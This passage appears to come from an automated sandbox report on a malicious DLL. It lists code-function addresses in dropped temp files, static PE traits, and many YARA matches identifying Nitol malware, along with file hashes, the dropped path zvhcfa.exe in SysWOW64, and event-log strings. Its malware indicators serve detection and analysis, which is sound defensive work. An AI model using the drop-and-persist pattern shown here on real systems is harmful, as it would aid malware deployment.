Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042593D	21_2_0042593D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004259C2	21_2_004259C2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004245C8	21_2_004245C8
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004259F0	21_2_004259F0
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00425A4B	21_2_00425A4B
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00422E6F	21_2_00422E6F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00425A1F	21_2_00425A1F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00425A36	21_2_00425A36
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062116F	21_2_0062116F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623C3D	21_2_00623C3D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623CF0	21_2_00623CF0
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623CC2	21_2_00623CC2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_006228C8	21_2_006228C8
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623D4B	21_2_00623D4B
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623D36	21_2_00623D36
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00623D1F	21_2_00623D1F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE34112	21_2_7FE34112
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_00A04112	34_2_00A04112
Source: C:\Windows\SysWOW64\zvhcfa.exe	Code function: 34_2_7FE44112	34_2_7FE44112

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: String function: 00403920 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: String function: 00403920 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: String function: 00403920 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: String function: 00403920 appears 34 times

Source: 26B1sczZ88.dll	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: hrlBAE7.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: hrl97BF.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: hrl97AF.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: hrlA367.tmp.20.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: hrlAF3E.tmp.28.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: zvhcfa.exe.30.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: hrl97AF.tmp.4.dr	Static PE information: Number of sections : 13 > 10
Source: hrl97BF.tmp.3.dr	Static PE information: Number of sections : 13 > 10
Source: hrlBAE7.tmp.0.dr	Static PE information: Number of sections : 13 > 10
Source: zvhcfa.exe.30.dr	Static PE information: Number of sections : 13 > 10
Source: hrlAF3E.tmp.28.dr	Static PE information: Number of sections : 13 > 10
Source: hrlA367.tmp.20.dr	Static PE information: Number of sections : 13 > 10

Source: 26B1sczZ88.dll

Binary or memory string: OriginalFilenameserver.EXE8 vs 26B1sczZ88.dll

Source: 26B1sczZ88.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: 26B1sczZ88.dll, type: SAMPLE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26B1sczZ88.dll, type: SAMPLE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 3.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 30.0.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.0.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 20.2.rundll32.exe.10004090.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.rundll32.exe.10004090.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 34.0.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 34.0.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 7.2.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 20.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 30.2.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 0.2.loaddll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 20.2.rundll32.exe.10004090.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 7.0.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.0.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 28.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 28.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 6.0.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 21.0.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.0.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 28.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 34.2.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 34.2.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 0.2.loaddll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.loaddll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 3.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: C:\Windows\SysWOW64\zvhcfa.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Windows\SysWOW64\zvhcfa.exe, type: DROPPED	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721

Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.25.dr	Binary string: \Device\LanmanRedirector
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr	Binary string: J\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Security.evtx.25.dr	Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysows
Source: System.evtx.25.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.25.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr	Binary string: TINQ-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.25.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sysi
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.25.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.25.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.25.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe(
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.25.dr	Binary string: \Device\LanmanRedirectorH
Source: System.evtx.25.dr	Binary string: C:\Device\HarddiskVolume3
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.25.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
